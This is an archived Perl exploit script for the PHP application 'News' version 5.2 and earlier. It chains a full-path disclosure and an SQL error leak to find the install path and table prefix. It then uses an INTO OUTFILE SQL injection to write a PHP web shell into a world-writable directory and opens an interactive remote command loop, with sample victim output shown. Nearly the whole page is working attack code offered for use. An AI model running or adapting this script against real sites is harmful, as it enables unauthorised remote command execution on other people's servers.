TUCoPS :: Web :: Apps :: b06-3397.htm

News <= 5.2 XSS, SQL Injection, Full Path Disclosure
News <= 5.2 XSS, SQL Injection, Full Path Disclosure
News <= 5.2 XSS, SQL Injection, Full Path Disclosure


#!/usr/bin/perl=0D
#=0D
#   VulnScr: News version 5.2 and prior=0D
# E-mail: contact@vincent-leclercq.com=0D 
# Web: www.vincent-leclercq.com=0D 
#=0D
#      Date: Thu June 29 12:01 2006=0D
# Credits: DarkFig (gmdarkfig@gmail.com)=0D 
#      Vuln: XSS, Full Path Disclosure, SQL Injection=0D
# Advisorie: http://www.acid-root.new.fr/advisories/news52.txt (french =))=0D 
#   Exploit: Create a php file (system($cmd)) in a dir ((smileys)chmoded 777 during the installation of the script)=0D
#=0D
#=0D
#  +-----------------------------------------+=0D
#  | News <= 5.2 SQL Injection (cmd exec) ---|=0D
#  +-----------------------------------------+=0D
#  [+]Full path: OK [/home/www/victim/news52]=0D
#  [+]Prefix: OK [news_]=0D
#  [+]File exist: OK=0D
#  [localhost]uname -a=0D
#  Linux ws6 2.6.16-SE-k8 #6 SMP PREEMPT Thu May 11 18:19:55 UTC 2006 i686 GNU/Linux=0D
#  [localhost]exit=0D
#  +-----------------------------------------+=0D
#=0D
use LWP::UserAgent;=0D
use LWP::Simple;=0D
use Getopt::Long;=0D
=0D
=0D
#=0D
# Argvs=0D
#=0D
header();=0D
if(!$ARGV[1]){ &usageis; }=0D
GetOptions( 'host=s'  => \$host,=0D
            'path=s'  => \$path,=0D
           );=0D
if($host =~ /http:\/\/(.*)/){=0D
  $host = $1;=0D
}=0D
=0D
=0D
#=0D
# Vars=0D
#=0D
my $helurl = 'http://'.$host.$path;=0D 
my $uagent = 'Perlnamigator';=0D
my $timeut = '30';=0D
my $errr00 = "[-]Can't connect to the host\n";=0D
my $errr01 = "[-]Can't get the full path of the website\n";=0D
my $errr02 = "[-]Can't get the table prefix\n";=0D
my $errr03 = "[-]The php file doesn't exist\n";=0D
=0D
=0D
#=0D
# Client=0D
#=0D
my $client = LWP::UserAgent->new();=0D
$client->agent($uagent);=0D
$client->timeout($timeut);=0D
=0D
=0D
#=0D
# First step: Determine the installation path.=0D
#=0D
$req1 = $client->post($helurl.'index.php', Content => ['mail[]' => 'root\@localhost.com', 'submit' => 'S%27inscrire'],) or print $errr00 and the_end();=0D 
if($req1->as_string =~ /in (.*?)\/configuration\/head.php<\/b>/) {=0D
  $fullpath = $1;=0D
  print "[+]Full path: OK [$fullpath]\n";=0D
  $fullpath .= "/admin/smileys/hello.php";=0D
} else {=0D
  print $errr01;=0D
  the_end();=0D
}=0D
=0D
=0D
#=0D
# Second step: Determine the table prefix.=0D
#=0D
$req2 = $client->get($helurl.'divers.php?action=XXX&id=%27ERROR');=0D
if($req2->as_string =~ /SELECT id FROM (.*?) WHERE/) {=0D
  $prefixe = $1;=0D
  print "[+]Prefix: OK [$prefixe]\n";=0D
} else {=0D
  print $errr02;=0D
  the_end();=0D
}=0D
=0D
=0D
#=0D
# Third step: Create a php file (system($cmd))=0D
#=0D
$inject = "%27%20UNION%20SELECT%20%27%3C?%20system(\$cmd);%20?%3E%27%20FROM%20".$prefixe."%20INTO%20OUTFILE%20%27".$fullpath."%27%23";=0D
$req3 = $client->get($helurl.'divers.php?action=XXX&id='.$inject) or print $errr00 and the_end();=0D
=0D
=0D
#=0D
# Fourth step: file_exists()? yes ! enjoy =)=0D
#=0D
$req4 = get($helurl.'admin/smileys/hello.php') or print $errr03 and the_end();=0D
print "[+]File exist: OK\n";=0D
&commandexec;=0D
=0D
=0D
#=0D
# Subroutines=0D
#=0D
sub commandexec {=0D
while(1 ne 2) {=0D
  print "[$host]"; chomp($cmd = );=0D
  if($cmd eq "exit"){ &the_end; }=0D
  $req5 = get($helurl.'admin/smileys/hello.php?cmd='.$cmd) or print $errr00 and the_end();=0D
  print $req5, "\n";=0D
}}=0D
=0D
sub usageis {=0D
  print "| Usage: -host localhost -path /news/  ---| \n";=0D
  &the_end;=0D
}=0D
=0D
sub the_end {=0D
  print "+-----------------------------------------+\n";=0D
  exit;=0D
}=0D
=0D
sub header {=0D
  print "\n+-----------------------------------------+\n";=0D
  print "| News <= 5.2 SQL Injection (cmd exec) ---|\n";=0D
  print "+-----------------------------------------+\n";=0D
}

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH